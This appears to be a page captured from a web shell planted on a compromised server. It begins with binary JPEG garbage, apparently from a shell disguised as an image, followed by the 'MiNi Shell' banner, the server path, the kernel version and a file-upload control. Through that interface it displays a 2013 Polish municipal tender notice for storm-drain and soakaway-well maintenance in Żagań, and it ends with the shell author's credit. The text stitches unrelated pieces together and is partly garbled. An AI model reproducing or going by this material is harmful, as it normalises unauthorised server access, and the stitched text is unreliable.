JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130110/6191-N-2013.html

<p class="kh_header"><b>Żagań: Bieżąca konserwacja kanalizacji deszczowej, wpustów ulicznych i studni chłonnych zlokalizowanych w pasie drogowym dróg gminnych oraz na gruntach komunalnych w Żaganiu</b><br>
<b>Numer ogłoszenia: 6191 - 2013; data zamieszczenia: 10.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżąca konserwacja kanalizacji deszczowej, wpustów ulicznych i studni chłonnych zlokalizowanych w pasie drogowym dróg gminnych oraz na gruntach komunalnych w Żaganiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Zakres usługi przewidzianej do wykonania  obejmuje:
a)	stałą konserwację kanalizacji deszczowej poprzez bieżące czyszczenie kanałów rurowych ( długości nie przekraczającej 1 km o średnicy O 200mm), przykanalików ( średnia długość od wpustu do studni ok. 2,5 m z rur o średnicy O 160), wpustów ulicznych i koryt odwodnienia liniowego, 
b)	stałą konserwację i czyszczenie studni chłonnych poprzez jej bieżące oczyszczanie z osadów i namułów,
c)	w  czasie ulewnych deszczów pompowanie nadmiaru wody z miejsc gdzie powstają zastoiska wraz z jej odwozem,
d)	wywóz i utylizacja odpadów powstałych przy czyszczeniu kanałów i wpustów.
2.2. W zakresie prac  wymienionych w punkcie 2.1 a, b. c, d Wykonawca jest 
       zobowiązany do wykonania:
       a)  w zakresie czyszczenia  wpustów  ulicznych:
           - oznakowanie i zabezpieczenie robót,
           - demontaż kraty-rusztu na wpuście,
           - usunięcie osadów i innych nieczystości stałych z wpustu wraz z 
              osadnikiem w całym jego przekroju ręczne lub mechaniczne,
           - usunięcie zalegającego osadu w całym przekroju przykanalika przez 
              przepłukiwanie lub w przypadku gdy niedrożność spowodowana jest  
              bardzo zbitymi osadami udrożnić przez przepychanie,
           - dokładne ręczne oczyszczenie elementów stalowych i żeliwnych - kraty, 
              dotyczy w szczególności zawiasów przy wpustach starego typu,
           - sprawdzenie stanu technicznego wpustu,
           - montaż zdemontowanej  kraty-rusztu na wpuście,
           - odwóz nieczystości na miejsce wysypu (składowania).
      
       UWAGA!
      W przypadku gdy czyszczenie odbywa się ręcznie i osady zanieczyszczenia 
      odkładane są na nawierzchnię ulicy przed załadunkiem na samochód, należy po 
      zakończonym   czyszczeniu wpustu dokładnie posprzątać nawierzchnię a w 
      razie konieczności spłukać wodą. Zabrania się składowania osadów na terenach 
      zielonych ( trawnikach);
  
      b)  w zakresie czyszczenia wpustu liniowego:
           - oznakowanie i zabezpieczenie robót,
           - demontaż kraty na wpuście,
           - ręczne wybranie zalegającego w korycie osadu,
           - usunięcie zalegającego osadu w całym przekroju przykanalika przez 
             przepłukiwanie lub w przypadku gdy niedrożność spowodowana jest 
             bardzo zbitymi osadami udrożnić przez przepychanie,
           - przepłukanie koryta wodą,
           - dokładne oczyszczenie kraty i gniazda,
           - umocowanie zdemontowanej  kraty,
           - oczyszczenie nawierzchni przy wpuście,
           - odwóz nieczystości na miejsce wysypu (składowania);
     
      c)  w zakresie czyszczenia odcinka kanału:
           - oznakowanie i zabezpieczenie robót
           - usunięcie zalegającego osadu w całym przekroju kanału przez 
              przepłukiwanie lub w przypadku gdy niedrożność spowodowana jest 
              bardzo zbitymi osadami udrożnić  przez przepychanie,
           - zebranie osadu i nieczystości ze studni rewizyjnych
           - odwóz nieczystości na miejsce wysypu (składowania); 
     
     d)  w zakresie czyszczenia studni chłonnych:
          Udrażnianie studni chłonnych należy wykonywać ręcznie lub mechanicznie 
          przy użyciu łopat lub ładowarek czerpakowych z zastosowaniem wyciągarek, 
          przez usuniecie najwyższej warstwy z piasku, zamulonej nagromadzonym 
          osadem i namułem. Wybrany  osad  lub zużyty materiał filtracyjny należy 
          wywieść dowolnym środkiem  transportu na składowisko odpadów;
     
     e)  w zakresie pompowania wody po opadach:
          W przypadku wystąpienia ulewnych deszczy lub roztopów nadmiar wody 
          który nie może być odebrany przez wpusty uliczne należy wypompować i 
          przewieźć do zlewni lub wlać do innego wpustu odbierającego wodę. 

2.3. Przy prowadzeniu robót w zakresie czyszczenia wpustów wykonywanych 
       mechanicznie pojazd wykonujący te prace musi być oznakowany i wyposażony 
       w urządzenia zabezpieczające zgodnie z Instrukcją oznakowania robót 
       prowadzonych w pasie drogowym.
2.4. Przy prowadzeniu pozostałych robót Wykonawca ma obowiązek montażu 
       oznakowania i zabezpieczeń na własny koszt. Zabezpieczenie robót następuje 
       zgodne z obowiązującymi przepisami w tym zakresie. 
2.5. Za niedrożny wpust uliczny uważa się taki wpust, w którym zanieczyszczenia 
      stałe  studni sięgają wyżej niż 20 cm poniżej dolnej krawędzi rury
      odprowadzającej wodę ze studni wpustu. 
2.6. Zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27.09.2001r. w sprawie
       katalogów odpadów ( Dz.U. Nr 112 poz . 1206), odpady z studzienek 
       kanalizacyjnych zaliczamy do grupy 20 03 06..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.47.00.00-2, 90.64.00.00-5, 90.51.36.00-2, 90.51.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawcy wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  określone w art.22 ust.1 ustawy Pzp, dotyczące : 
  a) posiadania uprawnień  do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa  nakładają obowiązek ich posiadania;
  b) posiadania  wiedzy i doświadczenia;
  c) dysponowania odpowiednim potencjałem technicznym oraz osobami  zdolnymi do  wykonania zamówienia;
  d) sytuacji ekonomicznej i finansowej.
6.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia np. w formie
       konsorcjum.
6.3. W przypadku wspólnego ubiegania się, Wykonawcy ustanawiają pełnomocnika do  reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do  reprezentowania w postępowaniu i zawarcia  umowy w  sprawie zamówienia publicznego. Na potwierdzenie ustanowienia pełnomocnika  Wykonawcy załączają do  oferty stosowne pełnomocnictwo.  
6.4. Jeżeli oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia zostanie  wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia  publicznego, umowy regulującej współpracę tych Wykonawców. 
6.5. Opis sposobu dokonywania oceny spełnienia warunków określonych w punkcie 
        6.1: 
   a) w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynności, Zamawiający nie żąda od Wykonawcy potwierdzenia  posiadania uprawnień do wykonywania działalności, gdyż przepisy prawa nie nakładają  obowiązku posiadania  takowych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten wymóg Wykonawcę,  który:
 - w okresie ostatnich trzech  lat przed upływem składania ofert, a jeżeli okres    prowadzenia działalności jest krótszy- w tym okresie,  wykonał  co  najmniej 1 usługę  dotyczącą bieżącej konserwacji kanalizacji deszczowej, wpustów ulicznych i studni chłonnych zlokalizowanych  w pasie drogowym.    
Na potwierdzenie spełnienia tego  warunku Wykonawca złoży wraz z ofertą dokument  określony w sekcji III.4.1. pozycja 1, z załączonym  do niego  dokumentem  potwierdzającym, że usługa  ta została wykonana należycie. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić  łącznie.     Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie 
od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych  zasobów na okres  korzystania z nich przy wykonywaniu zamówienia oraz składając w takim przypadku dokumenty  określone w sekcji III.4.2;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)  w zakresie dysponowania odpowiednim potencjałem technicznym do  wykonania 
      przedmiotu zamówienia Zamawiający uzna za spełniającego ten warunek tego
      Wykonawcę, który  będzie dysponował odpowiednim sprzętem niezbędnym do 
      realizacji przedmiotu zamówienia, a mianowicie będzie dysponował  : 
       - ładowarką  czerpakową,  z zastosowaniem wyciągarki, 
       - dowolnym środkiem transportu do wywozu osadów na składowisko odpadów, 
       - urządzeniem do wypompowywania nadmiaru wody  i do transportu  wody do 
         zlewni,
       - oznakowanym, wyposażonym w urządzenia zabezpieczające (zgodnie z 
         Instrukcją  Oznakowania Robót Prowadzonych w Pasie Drogowym)
         mechanicznym  pojazdem do   czyszczenia wpustów. 
      Na potwierdzenia spełnienia tego warunku Wykonawca złoży wraz z ofertą  dokument określony w sekcji III.4.1.pozycja 2 ogłoszenia. Wykonawcy występujący wspólnie powyższy warunek mogą spełnić łącznie. W zakresie dysponowania odpowiednim potencjałem technicznym Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji  zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  korzystania z nich przy wykonywaniu zamówienia oraz składając w takim przypadku dokumenty określone w sekcji III.4.2;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d) w zakresie sytuacji ekonomicznej i finansowej,  Zamawiający uzna za spełniającego te  wymogi tego Wykonawcę, który  będzie ubezpieczony   od odpowiedzialności cywilnej w  zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia  i  na potwierdzenie  spełnienia tego warunku złoży wraz z ofertą  dokument określony w sekcji III.4.1. pozycja 3  ogłoszenia. Wykonawcy występujący wspólnie   powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  oświadczenie o spełnieniu warunków udziału w postępowaniu  określonych w  art.22  ust.1 ustawy Prawo zamówień publicznych;
2) pełnomocnictwo- w przypadku wspólnego ubiegania  o zamówienie publiczne. 
2) pisemne zobowiązanie innych  podmiotów do oddania Wykonawcy  do dyspozycji niezbędnych  zasobów na okres  korzystania z nich przy wykonywaniu zamówienia- w przypadku gdy wykonawca polega  na wiedzy i doświadczeniu innych pomiotów  oraz na potencjale technicznym innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zagan.pl zakładka przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żagań, 68-100 Żagań,  Plac Słowiański 17,Biuro Kontroli i Zamówień Publicznych - na pisemny wniosek Wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2013 godzina 11:00, miejsce: Urząd Miasta Żagań,68-100 Żagań, Plac Słowiański 17, pok. nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com